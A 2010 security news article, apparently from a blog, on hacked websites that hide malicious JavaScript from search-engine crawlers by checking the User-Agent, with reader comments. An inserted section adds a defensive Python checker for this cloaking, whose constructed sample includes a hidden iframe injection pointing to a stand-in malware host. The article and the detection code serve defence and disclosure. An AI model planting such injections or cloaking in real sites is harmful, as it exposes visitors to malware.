April 23, 2010

Malicious hackers spend quite a bit of time gaming the Internet search engines in a bid to have their malware-laden sites turn up on the first page of search results for hot, trending news topics. Increasingly, though, computer criminals also are taking steps to block search engine bots from indexing legitimate Web pages that have been hacked and booby-trapped with hostile code.

Search giants Yahoo! and Google each have automated programs that crawl millions of Web sites each week in search of those hosting malicious code. When the search providers find these sites, they typically append a warning to the hacked Web site’s listing in search results, alerting the would-be visitor that the site could be dangerous. These warnings not only result in fewer people visiting infected sites, but they have a tendency to alert a listed site’s owners to a malware problem that needs attention.

This is all well and good for you and me, but not so wonderful for the bad guys. Unless, of course, said bad guys have planned ahead, by inserting code in their hacked sites that hands out malicious code to everyone except the automated anti-malware bots deployed by the top search providers.

Which is precisely what security expert David Dede found earlier this month while analyzing some Web-based malware.

“So basically the malware was checking if the user agent was from the Google or Yahoo bot and not returning the malware on that case,” wrote Dede, a security expert from Brazil who maintains the blog Sucuri Security. Meanwhile, regular visitors to the infected sites received malicious Javascript that tried to foist malware, Dede found.
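A defender-side check for the behaviour Dede describes, added here as an example (it is not code from the article, from Sucuri, or from Google): it fetches the same page under a browser User-Agent and under crawler User-Agents, then reports script elements that only the browser copy contains. The crawler strings are assumptions modelled on the public Googlebot and Yahoo! Slurp identifiers, the sample pages are constructed, and the live fetch helper assumes plain HTTP access to the page.

```python
import re
import urllib.request
from typing import Callable, Dict, List

# Browser and crawler User-Agent strings used for the comparison. The crawler
# strings are assumptions; a given site may key its cloaking on other substrings.
BROWSER_UA = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0 Safari/537.36"
CRAWLER_UAS = {
    "google": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "yahoo": "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
}
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)

def script_blocks(html: str) -> List[str]:
    """Return the <script> elements of a page, whitespace-normalised and sorted."""
    return sorted(" ".join(m.split()) for m in SCRIPT_RE.findall(html))

def cloaking_report(fetch: Callable[[str], str]) -> Dict[str, List[str]]:
    """Fetch the page as a browser and as each crawler; map each crawler name to
    the script elements the browser got but that crawler did not (empty = no cloaking)."""
    browser_scripts = script_blocks(fetch(BROWSER_UA))
    report: Dict[str, List[str]] = {}
    for name, ua in CRAWLER_UAS.items():
        crawler_scripts = script_blocks(fetch(ua))
        hidden = [s for s in browser_scripts if s not in crawler_scripts]
        if hidden:
            report[name] = hidden
    return report

def http_fetch(url: str) -> Callable[[str], str]:
    """Build a fetch(user_agent) function for a live URL using urllib."""
    def fetch(user_agent: str) -> str:
        req = urllib.request.Request(url, headers={"User-Agent": user_agent})
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.read().decode("utf-8", errors="replace")
    return fetch

# Constructed pages standing in for a compromised site (not captured from any
# real host): crawlers get the clean page, browsers get one extra script.
CLEAN_PAGE = "<html><head><script src='/js/menu.js'></script></head><body>News</body></html>"
INJECTED_PAGE = CLEAN_PAGE.replace("</body>", "<script>document.write('<iframe src=\"http://malware.example.invalid/\" "
                                              "width=1 height=1>')</script></body>")

def sample_fetch(user_agent: str) -> str:
    """Offline stand-in for http_fetch() that behaves the way the article describes."""
    if "Googlebot" in user_agent or "Yahoo! Slurp" in user_agent:
        return CLEAN_PAGE
    return INJECTED_PAGE
```

Run `cloaking_report(http_fetch("https://your-site.example/"))` against a site you administer; any non-empty result is worth a look at the page's templates and server-side includes.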

Denis Sinegubko, a Russian researcher with the blog UnmaskParasites.com, has recently documented at least two examples of malware stitched into blogs that will modify the host site to hide malicious redirects from Google’s search bots.

“And the fact that I can see many such blogs in Google search results without any warnings shows that this simple trick does its job,” Sinegubko wrote.

Google’s search experts say they’re aware of and constantly counteracting these types of obfuscation techniques.

Niels Provos, principal software engineer at Google, said cyber crooks frequently try to play both sides, by attempting to block search bots from finding malware stitched into hacked sites, while simultaneously gaming the search engine bots.

“This has been going on for some time. What happens is if a Web crawler comes along, [the attackers will configure the hacked site so that it] ends up showing [trending content] they get from news sites,” Provos said. “This is to game the ranking of search content. But then if the visitor comes to one of these sites via a search engine, he ends up getting exploit code.”

Provos declined to discuss the specific steps Google takes to combat these tactics, noting that the fight with these Web site hackers is a constant arms race.

“Often these are just aimed at making it more difficult for someone from the outside investigating this kind of thing to find the bad code,” Provos said. “In any case, we have to make adjustments from time to time, but we work around them.”

6 thoughts on “Hiding from Anti-Malware Search Bots”

  1. N3UJJ

    Hey, a great idea: set your user agent string to match a search engine, and the site won’t expose its exploits.

  2. KFritz

    I’m betting that the folks @ Google probably anticipated this development. It’s a completely logical and consistent development in the malware wars.

    It would be interesting to check on the duration of each individual ‘workaround’ by malware writers–how long it lasts before Google negates it. That would be a good indicator of the probability of infection for ordinary users. Of course, this would be no consolation for the unfortunate few who are infected while the malware ‘workarounds’ are functional.

    Great story!

  3. Search Engine Mart

    Traditionally speaking, it is hard to imagine our lives without search engines. Even the most recent glimmer of Google moving out of the Chinese mainland shows us that powerful search engines that practically regulate all the info we receive from the internet can and will protect their interest without regard to the impact of their absence.

  4. kingpin

    This is where addons like WOT play an important role!
    Also, a Real Time Protection tool like MalwareBytes Pro is a must. It always blocks malicious IPs before the page even opens; this could be an FP in some cases, but better to be safe than to be sorry later.

  5. JCitizen

    What cracks me up is that in my honeypot searches, the search results for the attack-infected sites are more accurate in what I want to find out than the typical trusted results.

    I quite often click on these “grey” results, as I know they will result in an attack. And they do often enough!

    Maybe Google could learn a thing or two about making their results more relevant than the criminals’??
